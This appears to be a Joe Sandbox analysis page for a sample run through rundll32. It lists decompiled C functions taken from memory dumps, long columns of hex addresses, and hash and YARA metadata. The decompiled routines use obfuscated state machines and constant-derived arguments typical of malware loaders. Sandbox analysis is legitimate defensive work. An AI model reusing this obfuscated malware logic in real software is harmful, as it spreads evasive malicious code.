                                                                                                                                                            0x0038071e
                                                                                                                                                            0x00380726
                                                                                                                                                            0x0038072e
                                                                                                                                                            0x00380736
                                                                                                                                                            0x0038073a
                                                                                                                                                            0x00380742
                                                                                                                                                            0x0038074a
                                                                                                                                                            0x00380752
                                                                                                                                                            0x0038075a
                                                                                                                                                            0x0038075f
                                                                                                                                                            0x00380767
                                                                                                                                                            0x0038076f
                                                                                                                                                            0x00380777
                                                                                                                                                            0x0038077f
                                                                                                                                                            0x00380787
                                                                                                                                                            0x0038078f
                                                                                                                                                            0x00380797
                                                                                                                                                            0x0038079f
                                                                                                                                                            0x003807a7
                                                                                                                                                            0x003807af
                                                                                                                                                            0x003807b7
                                                                                                                                                            0x003807bf
                                                                                                                                                            0x003807c7
                                                                                                                                                            0x003807cc
                                                                                                                                                            0x003807d1
                                                                                                                                                            0x003807d6
                                                                                                                                                            0x003807de
                                                                                                                                                            0x003807e6
                                                                                                                                                            0x003807ee
                                                                                                                                                            0x003807f6
                                                                                                                                                            0x003807fe
                                                                                                                                                            0x00380806
                                                                                                                                                            0x0038080e
                                                                                                                                                            0x00380818
                                                                                                                                                            0x00380820
                                                                                                                                                            0x00380828
                                                                                                                                                            0x00380830
                                                                                                                                                            0x00380838
                                                                                                                                                            0x00380845
                                                                                                                                                            0x00380849
                                                                                                                                                            0x00380851
                                                                                                                                                            0x00380859
                                                                                                                                                            0x00380859
                                                                                                                                                            0x0038085f
                                                                                                                                                            0x0038085f
                                                                                                                                                            0x00380864
                                                                                                                                                            0x00380864
                                                                                                                                                            0x00380866
                                                                                                                                                            0x00380985
                                                                                                                                                            0x0038099f
                                                                                                                                                            0x003809a3
                                                                                                                                                            0x003809a8
                                                                                                                                                            0x003809ab
                                                                                                                                                            0x003809af
                                                                                                                                                            0x003809be
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003809b1
                                                                                                                                                            0x003809b3
                                                                                                                                                            0x003809b8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003809b8
                                                                                                                                                            0x0038086c
                                                                                                                                                            0x00380872
                                                                                                                                                            0x0038091a
                                                                                                                                                            0x00380923
                                                                                                                                                            0x00380963
                                                                                                                                                            0x00380967
                                                                                                                                                            0x00380970
                                                                                                                                                            0x00380973
                                                                                                                                                            0x00380978
                                                                                                                                                            0x003809c0
                                                                                                                                                            0x003809c0
                                                                                                                                                            0x003809c6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380878
                                                                                                                                                            0x0038087e
                                                                                                                                                            0x003808c7
                                                                                                                                                            0x003808c8
                                                                                                                                                            0x003808cb
                                                                                                                                                            0x003808cc
                                                                                                                                                            0x003808d1
                                                                                                                                                            0x003808d6
                                                                                                                                                            0x003808e9
                                                                                                                                                            0x003808f2
                                                                                                                                                            0x003808f7
                                                                                                                                                            0x003808fd
                                                                                                                                                            0x00380907
                                                                                                                                                            0x00380909
                                                                                                                                                            0x0038090c
                                                                                                                                                            0x0038090f
                                                                                                                                                            0x00380912
                                                                                                                                                            0x0038085f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380880
                                                                                                                                                            0x00380882
                                                                                                                                                            0x003809e7
                                                                                                                                                            0x003809fa
                                                                                                                                                            0x00380888
                                                                                                                                                            0x0038088e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380894
                                                                                                                                                            0x003808ae
                                                                                                                                                            0x003808b3
                                                                                                                                                            0x0038088e
                                                                                                                                                            0x00380882
                                                                                                                                                            0x0038087e
                                                                                                                                                            0x00380872
                                                                                                                                                            0x00380a04
                                                                                                                                                            0x00380a0d
                                                                                                                                                            0x003809cb
                                                                                                                                                            0x003809cb
                                                                                                                                                            0x003809cb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003809d7
                                                                                                                                                            0x0038085f

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,
                                                                                                                                                            • API String ID: 0-2314114710
                                                                                                                                                            • Opcode ID: 10bd05cb842d9e11d31f459c79b3193926251798023c1792c01d7a08ca893a54
                                                                                                                                                            • Instruction ID: dc00707d2e06aa77b8ed20983cdca64f5b9e5dd0d1a2c42868aa51ac4065994b
                                                                                                                                                            • Opcode Fuzzy Hash: 10bd05cb842d9e11d31f459c79b3193926251798023c1792c01d7a08ca893a54
                                                                                                                                                            • Instruction Fuzzy Hash: 94E130725083809FD3A8CF25D58AA0BBBF1BBC4718F60891DF59A86260C7B1C949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Iconic
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 110040809-0
                                                                                                                                                            • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                                            • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                                                            • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                                            • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00389EEC Relevance: 1.5, Strings: 1, Instructions: 226COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                            			E00389EEC() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t257;
				void* _t259;
				char _t263;
				void* _t264;
				void* _t266;

				_v64 = 0xd7ee0e;
				_t257 = 0x22;
				_v64 = _v64 / _t257;
				_v64 = _v64 + 0x89a9;
				_t219 = 0;
				_v64 = _v64 ^ 0x0000b335;
				_t259 = 0xb83ebc6;
				_v96 = 0xf5dfb6;
				_v96 = _v96 >> 6;
				_t221 = 0x26;
				_v96 = _v96 / _t221;
				_t222 = 0x2d;
				_v96 = _v96 * 0x58;
				_v96 = _v96 ^ 0x000b9251;
				_v60 = 0xd70e95;
				_v60 = _v60 >> 9;
				_v60 = _v60 + 0xffffe8b9;
				_v60 = _v60 ^ 0x00062b78;
				_v44 = 0xb641ac;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x0002d028;
				_v52 = 0xbf8457;
				_t223 = 0x5d;
				_v52 = _v52 / _t223;
				_v52 = _v52 | 0xbb7661a2;
				_v52 = _v52 ^ 0xbb710206;
				_v80 = 0x47b11a;
				_v80 = _v80 ^ 0xc2c4229c;
				_t224 = 0x18;
				_v80 = _v80 / _t224;
				_v80 = _v80 + 0xffff1c96;
				_v80 = _v80 ^ 0x08184a4c;
				_v36 = 0x40dca8;
				_v36 = _v36 + 0x3144;
				_v36 = _v36 ^ 0x004d2780;
				_v40 = 0xec5297;
				_v40 = _v40 * 0x45;
				_v40 = _v40 ^ 0x3fbac2f2;
				_v72 = 0x18b121;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1e;
				_v72 = _v72 + 0xfd79;
				_v72 = _v72 ^ 0x0173ec5f;
				_v76 = 0xd8cc67;
				_v76 = _v76 >> 2;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 * 0x23;
				_v76 = _v76 ^ 0x000d42f3;
				_v88 = 0x5f1bd9;
				_v88 = _v88 + 0x89b3;
				_v88 = _v88 ^ 0xee5f73f3;
				_v88 = _v88 ^ 0xfa82a5ad;
				_v88 = _v88 ^ 0x14801a76;
				_v92 = 0x778c42;
				_t225 = 0x6d;
				_v92 = _v92 * 0x69;
				_v92 = _v92 << 0xb;
				_v92 = _v92 | 0xba472be1;
				_v92 = _v92 ^ 0xfe7d7315;
				_v56 = 0x5dd318;
				_v56 = _v56 / _t257;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x2c2721c6;
				_v84 = 0xd870dc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 | 0x1345b487;
				_v84 = _v84 * 0x5a;
				_v84 = _v84 ^ 0xc68bf031;
				_v48 = 0x9a419e;
				_v48 = _v48 | 0xfa3afde2;
				_v48 = _v48 ^ 0xfabdbed6;
				_v32 = 0x7a1ab;
				_v32 = _v32 / _t225;
				_v32 = _v32 ^ 0x000f5e95;
				_v68 = 0x67bbab;
				_v68 = _v68 + 0xffffccf8;
				_v68 = _v68 ^ 0x5c1ded32;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x4cb92f41;
				_t263 = _v28;
				_t258 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t259 - 0xc23b37f;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							E00388519(_v56, _v84, _v24);
							_t259 = 0xdb1153f;
							continue;
						}
						if(_t259 == 0xab8c2) {
							_t209 =  *0x393e10; // 0x0
							E00378ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
							_t212 =  *0x393e10; // 0x0
							_t234 = _v16;
							_t264 = _t264 + 0xc;
							_t219 = 1;
							_t259 = 0xc23b37f;
							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
							continue;
						}
						if(_t259 == 0x26dca52) {
							_t234 = _v96;
							_t214 = E0037A9CE(_v96, _t263,  &_v28, _v60, _v44);
							_t258 = _t214;
							_t264 = _t264 + 0xc;
							if(_t214 == 0) {
								goto L22;
							}
							_t259 = 0xe747a68;
							continue;
						}
						if(_t259 == 0xa9b692f) {
							_t263 = E0037F899(_t234);
							_t259 = 0x26dca52;
							continue;
						}
						if(_t259 != 0xb83ebc6) {
							goto L21;
						} else {
							_t259 = 0xa9b692f;
							continue;
						}
					}
					if(_t259 == 0xdb1153f) {
						E00374E7D(_v48, _v32, _t258, _v68);
						_t259 = 0xdb3b1d3;
						goto L21;
					}
					if(_t259 == 0xe566670) {
						_t207 = E0038894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
						_t264 = _t264 + 0x10;
						asm("sbb esi, esi");
						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
						goto L1;
					}
					if(_t259 != 0xe747a68) {
						goto L21;
					}
					_t259 = 0xdb1153f;
					if(_v28 > 2) {
						_t218 = E00374346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
						_v24 = _t218;
						_pop(_t234);
						if(_t218 != 0) {
							_t259 = 0xe566670;
						}
					}
					goto L1;
					L21:
				} while (_t259 != 0xdb3b1d3);
				L22:
				return _t219;
			}










































                                                                                                                                                            0x00389eef
                                                                                                                                                            0x00389f03
                                                                                                                                                            0x00389f08
                                                                                                                                                            0x00389f0e
                                                                                                                                                            0x00389f16
                                                                                                                                                            0x00389f18
                                                                                                                                                            0x00389f20
                                                                                                                                                            0x00389f25
                                                                                                                                                            0x00389f2d
                                                                                                                                                            0x00389f36
                                                                                                                                                            0x00389f3b
                                                                                                                                                            0x00389f46
                                                                                                                                                            0x00389f49
                                                                                                                                                            0x00389f4d
                                                                                                                                                            0x00389f55
                                                                                                                                                            0x00389f5d
                                                                                                                                                            0x00389f62
                                                                                                                                                            0x00389f6a
                                                                                                                                                            0x00389f72
                                                                                                                                                            0x00389f82
                                                                                                                                                            0x00389f86
                                                                                                                                                            0x00389f8e
                                                                                                                                                            0x00389f9a
                                                                                                                                                            0x00389f9f
                                                                                                                                                            0x00389fa5
                                                                                                                                                            0x00389fad
                                                                                                                                                            0x00389fb5
                                                                                                                                                            0x00389fbd
                                                                                                                                                            0x00389fc9
                                                                                                                                                            0x00389fcc
                                                                                                                                                            0x00389fd0
                                                                                                                                                            0x00389fd8
                                                                                                                                                            0x00389fe0
                                                                                                                                                            0x00389fe8
                                                                                                                                                            0x00389ff0
                                                                                                                                                            0x00389ff8
                                                                                                                                                            0x0038a005
                                                                                                                                                            0x0038a009
                                                                                                                                                            0x0038a011
                                                                                                                                                            0x0038a019
                                                                                                                                                            0x0038a022
                                                                                                                                                            0x0038a026
                                                                                                                                                            0x0038a02e
                                                                                                                                                            0x0038a036
                                                                                                                                                            0x0038a03e
                                                                                                                                                            0x0038a043
                                                                                                                                                            0x0038a04d
                                                                                                                                                            0x0038a051
                                                                                                                                                            0x0038a059
                                                                                                                                                            0x0038a061
                                                                                                                                                            0x0038a069
                                                                                                                                                            0x0038a071
                                                                                                                                                            0x0038a079
                                                                                                                                                            0x0038a081
                                                                                                                                                            0x0038a092
                                                                                                                                                            0x0038a093
                                                                                                                                                            0x0038a097
                                                                                                                                                            0x0038a09c
                                                                                                                                                            0x0038a0a4
                                                                                                                                                            0x0038a0ac
                                                                                                                                                            0x0038a0bc
                                                                                                                                                            0x0038a0c0
                                                                                                                                                            0x0038a0c5
                                                                                                                                                            0x0038a0cd
                                                                                                                                                            0x0038a0d5
                                                                                                                                                            0x0038a0da
                                                                                                                                                            0x0038a0e7
                                                                                                                                                            0x0038a0eb
                                                                                                                                                            0x0038a0f3
                                                                                                                                                            0x0038a0fb
                                                                                                                                                            0x0038a103
                                                                                                                                                            0x0038a10b
                                                                                                                                                            0x0038a119
                                                                                                                                                            0x0038a11d
                                                                                                                                                            0x0038a125
                                                                                                                                                            0x0038a12d
                                                                                                                                                            0x0038a135
                                                                                                                                                            0x0038a13d
                                                                                                                                                            0x0038a142
                                                                                                                                                            0x0038a14a
                                                                                                                                                            0x0038a14e
                                                                                                                                                            0x0038a14e
                                                                                                                                                            0x0038a152
                                                                                                                                                            0x0038a152
                                                                                                                                                            0x0038a152
                                                                                                                                                            0x0038a152
                                                                                                                                                            0x0038a158
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a15e
                                                                                                                                                            0x0038a216
                                                                                                                                                            0x0038a21c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a21c
                                                                                                                                                            0x0038a16a
                                                                                                                                                            0x0038a1d5
                                                                                                                                                            0x0038a1e9
                                                                                                                                                            0x0038a1ee
                                                                                                                                                            0x0038a1f5
                                                                                                                                                            0x0038a1f9
                                                                                                                                                            0x0038a1fc
                                                                                                                                                            0x0038a1fd
                                                                                                                                                            0x0038a202
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a202
                                                                                                                                                            0x0038a172
                                                                                                                                                            0x0038a1af
                                                                                                                                                            0x0038a1b4
                                                                                                                                                            0x0038a1b9
                                                                                                                                                            0x0038a1bb
                                                                                                                                                            0x0038a1c0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a1c6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a1c6
                                                                                                                                                            0x0038a17a
                                                                                                                                                            0x0038a198
                                                                                                                                                            0x0038a19a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a19a
                                                                                                                                                            0x0038a182
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a188
                                                                                                                                                            0x0038a188
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a188
                                                                                                                                                            0x0038a182
                                                                                                                                                            0x0038a22c
                                                                                                                                                            0x0038a2c6
                                                                                                                                                            0x0038a2cd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a2cd
                                                                                                                                                            0x0038a238
                                                                                                                                                            0x0038a29a
                                                                                                                                                            0x0038a29f
                                                                                                                                                            0x0038a2a6
                                                                                                                                                            0x0038a2ae
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a2ae
                                                                                                                                                            0x0038a240
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a24b
                                                                                                                                                            0x0038a250
                                                                                                                                                            0x0038a265
                                                                                                                                                            0x0038a26a
                                                                                                                                                            0x0038a26f
                                                                                                                                                            0x0038a272
                                                                                                                                                            0x0038a278
                                                                                                                                                            0x0038a278
                                                                                                                                                            0x0038a272
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a2d2
                                                                                                                                                            0x0038a2d2
                                                                                                                                                            0x0038a2e1
                                                                                                                                                            0x0038a2e7

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: D1
                                                                                                                                                            • API String ID: 0-2215811268
                                                                                                                                                            • Opcode ID: a87a30863f470729f99a0bd5a4de79039dd0d889425ed21d6aabb95107f27afb
                                                                                                                                                            • Instruction ID: 2a36ea107c40507f988a424299c24d1a229a3371f378811ea132219592733cfd
                                                                                                                                                            • Opcode Fuzzy Hash: a87a30863f470729f99a0bd5a4de79039dd0d889425ed21d6aabb95107f27afb
                                                                                                                                                            • Instruction Fuzzy Hash: 21A165729083008FD369DF65C48941BFBE1BBC4354F50896EF5A99B220D7B5CA498F87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038BB23 Relevance: 1.4, Strings: 1, Instructions: 173COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                            			E0038BB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t138;
				intOrPtr _t161;
				void* _t162;
				void* _t164;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t189;

				_t162 = __ecx;
				_push(1);
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t138);
				_v16 = 0xdfc885;
				_t189 =  &(( &_v76)[8]);
				asm("stosd");
				_t185 = 0;
				_t164 = 0xcc97672;
				asm("stosd");
				asm("stosd");
				_v32 = 0x60c2fa;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00046f58;
				_v76 = 0xb548f0;
				_v76 = _v76 >> 0xc;
				_t181 = 0xc;
				_v76 = _v76 * 0x3c;
				_v76 = _v76 + 0xffff64d0;
				_v76 = _v76 ^ 0x0001fd54;
				_v52 = 0x15927a;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000151ae;
				_v56 = 0xd6ed9;
				_t182 = 0x1a;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 + 0xfffffbb4;
				_v56 = _v56 ^ 0x0345d46e;
				_v64 = 0xba2b53;
				_v64 = _v64 * 0x6d;
				_v64 = _v64 ^ 0x73d6d9cf;
				_v64 = _v64 * 0x31;
				_v64 = _v64 ^ 0x981330b4;
				_v60 = 0x269f8;
				_v60 = _v60 >> 5;
				_v60 = _v60 + 0xffffb859;
				_v60 = _v60 ^ 0xfff00afd;
				_v68 = 0xfd9147;
				_v68 = _v68 ^ 0x8de1643f;
				_v68 = _v68 / _t182;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000df039;
				_v72 = 0x5def36;
				_v72 = _v72 | 0xd620e1c7;
				_v72 = _v72 + 0xd307;
				_t183 = 0x48;
				_v72 = _v72 / _t183;
				_v72 = _v72 ^ 0x02f0e4dc;
				_v24 = 0xf7704c;
				_v24 = _v24 + 0x27dd;
				_v24 = _v24 ^ 0x00ff74b2;
				_v28 = 0x151ed9;
				_v28 = _v28 * 0x48;
				_v28 = _v28 ^ 0x05f046e2;
				_v36 = 0xddc4df;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 | 0x7f83127d;
				_v36 = _v36 ^ 0x7f8e5ab1;
				_v40 = 0x29fd7f;
				_v40 = _v40 >> 7;
				_v40 = _v40 | 0x8d3b2756;
				_v40 = _v40 ^ 0x8d37b79a;
				_v44 = 0x8dc5a8;
				_v44 = _v44 * 0x63;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x036b3557;
				_v48 = 0xd61f7e;
				_v48 = _v48 | 0xd43d52c3;
				_v48 = _v48 + 0xa376;
				_v48 = _v48 ^ 0xd504b7b0;
				_t184 = _v20;
				while(_t164 != 0x2524be6) {
					if(_t164 == 0xcc97672) {
						_t164 = 0xe41debb;
						continue;
					} else {
						if(_t164 == 0xdd773d9) {
							if(E0038D8EC(_v52, _v56,  &_v20, _t184) != 0) {
								_t164 = 0xe01b1ec;
								continue;
							}
						} else {
							if(_t164 == 0xe01b1ec) {
								E00390AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
								_t189 =  &(_t189[0xa]);
								_t164 = 0x2524be6;
								_t185 =  !=  ? 1 : _t185;
								continue;
							} else {
								if(_t164 != 0xe41debb) {
									L13:
									if(_t164 != 0x78a313b) {
										continue;
									}
								} else {
									_t161 = E00373DE2(_t164);
									_t184 = _t161;
									if(_t161 != 0xffffffff) {
										_t164 = 0xdd773d9;
										continue;
									}
								}
							}
						}
					}
					return _t185;
				}
				E00381E67(_v36, _v40, _v44, _v48, _v20);
				_t189 =  &(_t189[3]);
				_t164 = 0x78a313b;
				goto L13;
			}





























                                                                                                                                                            0x0038bb2c
                                                                                                                                                            0x0038bb2f
                                                                                                                                                            0x0038bb30
                                                                                                                                                            0x0038bb31
                                                                                                                                                            0x0038bb35
                                                                                                                                                            0x0038bb39
                                                                                                                                                            0x0038bb3d
                                                                                                                                                            0x0038bb41
                                                                                                                                                            0x0038bb42
                                                                                                                                                            0x0038bb43
                                                                                                                                                            0x0038bb48
                                                                                                                                                            0x0038bb56
                                                                                                                                                            0x0038bb59
                                                                                                                                                            0x0038bb5c
                                                                                                                                                            0x0038bb5e
                                                                                                                                                            0x0038bb65
                                                                                                                                                            0x0038bb66
                                                                                                                                                            0x0038bb67
                                                                                                                                                            0x0038bb6f
                                                                                                                                                            0x0038bb74
                                                                                                                                                            0x0038bb7c
                                                                                                                                                            0x0038bb84
                                                                                                                                                            0x0038bb8e
                                                                                                                                                            0x0038bb91
                                                                                                                                                            0x0038bb95
                                                                                                                                                            0x0038bb9d
                                                                                                                                                            0x0038bba5
                                                                                                                                                            0x0038bbbd
                                                                                                                                                            0x0038bbc1
                                                                                                                                                            0x0038bbc9
                                                                                                                                                            0x0038bbd6
                                                                                                                                                            0x0038bbd9
                                                                                                                                                            0x0038bbdd
                                                                                                                                                            0x0038bbe5
                                                                                                                                                            0x0038bbed
                                                                                                                                                            0x0038bbfa
                                                                                                                                                            0x0038bbfe
                                                                                                                                                            0x0038bc0b
                                                                                                                                                            0x0038bc0f
                                                                                                                                                            0x0038bc17
                                                                                                                                                            0x0038bc1f
                                                                                                                                                            0x0038bc24
                                                                                                                                                            0x0038bc2c
                                                                                                                                                            0x0038bc34
                                                                                                                                                            0x0038bc3c
                                                                                                                                                            0x0038bc4c
                                                                                                                                                            0x0038bc50
                                                                                                                                                            0x0038bc55
                                                                                                                                                            0x0038bc5d
                                                                                                                                                            0x0038bc65
                                                                                                                                                            0x0038bc6d
                                                                                                                                                            0x0038bc79
                                                                                                                                                            0x0038bc7c
                                                                                                                                                            0x0038bc80
                                                                                                                                                            0x0038bc88
                                                                                                                                                            0x0038bc90
                                                                                                                                                            0x0038bc98
                                                                                                                                                            0x0038bca0
                                                                                                                                                            0x0038bcad
                                                                                                                                                            0x0038bcb1
                                                                                                                                                            0x0038bcb9
                                                                                                                                                            0x0038bcc1
                                                                                                                                                            0x0038bcc6
                                                                                                                                                            0x0038bcce
                                                                                                                                                            0x0038bcd6
                                                                                                                                                            0x0038bcde
                                                                                                                                                            0x0038bce3
                                                                                                                                                            0x0038bceb
                                                                                                                                                            0x0038bcf3
                                                                                                                                                            0x0038bd00
                                                                                                                                                            0x0038bd04
                                                                                                                                                            0x0038bd09
                                                                                                                                                            0x0038bd11
                                                                                                                                                            0x0038bd19
                                                                                                                                                            0x0038bd21
                                                                                                                                                            0x0038bd29
                                                                                                                                                            0x0038bd31
                                                                                                                                                            0x0038bd35
                                                                                                                                                            0x0038bd47
                                                                                                                                                            0x0038bde6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bd4d
                                                                                                                                                            0x0038bd53
                                                                                                                                                            0x0038bdda
                                                                                                                                                            0x0038bddc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bddc
                                                                                                                                                            0x0038bd55
                                                                                                                                                            0x0038bd5b
                                                                                                                                                            0x0038bdac
                                                                                                                                                            0x0038bdb1
                                                                                                                                                            0x0038bdb4
                                                                                                                                                            0x0038bdbb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bd5d
                                                                                                                                                            0x0038bd63
                                                                                                                                                            0x0038be11
                                                                                                                                                            0x0038be17
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bd69
                                                                                                                                                            0x0038bd71
                                                                                                                                                            0x0038bd76
                                                                                                                                                            0x0038bd7b
                                                                                                                                                            0x0038bd81
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bd81
                                                                                                                                                            0x0038bd7b
                                                                                                                                                            0x0038bd63
                                                                                                                                                            0x0038bd5b
                                                                                                                                                            0x0038bd53
                                                                                                                                                            0x0038be26
                                                                                                                                                            0x0038be26
                                                                                                                                                            0x0038be04
                                                                                                                                                            0x0038be09
                                                                                                                                                            0x0038be0c
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 6]
                                                                                                                                                            • API String ID: 0-3974934468
                                                                                                                                                            • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                                            • Instruction ID: 66aaac2f21e750288b00074470b1b8231166d775459c47f89c03c89ed9e1ef1c
                                                                                                                                                            • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                                            • Instruction Fuzzy Hash: 89714F71108342AFC359DF26C88941BFBE5FBC9758F504A1EF6969A260D372DA098F43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00375361 Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 91%
